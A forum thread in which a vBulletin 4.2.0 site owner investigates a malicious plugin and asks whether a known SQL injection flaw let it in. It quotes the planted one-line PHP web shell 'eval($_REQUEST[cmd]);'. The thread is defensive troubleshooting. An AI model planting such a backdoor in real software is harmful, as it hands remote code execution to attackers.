This week we found a new plugin (we are still investigating about "how") with this code:

eval($_REQUEST[cmd]);

Apparently, in apache logs and vBulletin logs there is nothing.

Do you know any known issues about this vulnerability in vBulletin 4.2.0 l2?

Seems to be similar to this one:

http://www.pcworld.com/article/2455500/emergency-vbulletin-patch-fixes-dangerous-sql-injection-vulnerability.html

This isn't present in vBulletin by default. It's a piece of code implemented by a hacker or someone who wants to do bad stuff.

I knew that ................. i'm just asking if there is some known vulnerability in vbulletin 4.2.0 l2 that let bad guys do some sql injection in tables like plugin, so that i can save time investigating by myself to find the exploit used to inject that code.

We don't know what plugins you have or if you have the install folder still in your FTP so its hard to answer. The best way would be to get someone to login and fix your problem if you don't know how to do it yourself

As far as I know there is no public exploit for vBulletin 4.2+, a private exploit is always possible or a vulnerable plugin.

i'm just asking if there is some known vulnerability in vbulletin 4.2.0 l2 that let bad guys do some sql injection in tables like plugin.
No, there isnt.

In 4.2? If you've left the install folder around, yes. If you haven't no.

In 4.2? If you've left the install folder around, yes. If you haven't no.

It's the first thing i 've deleted after finishing installing it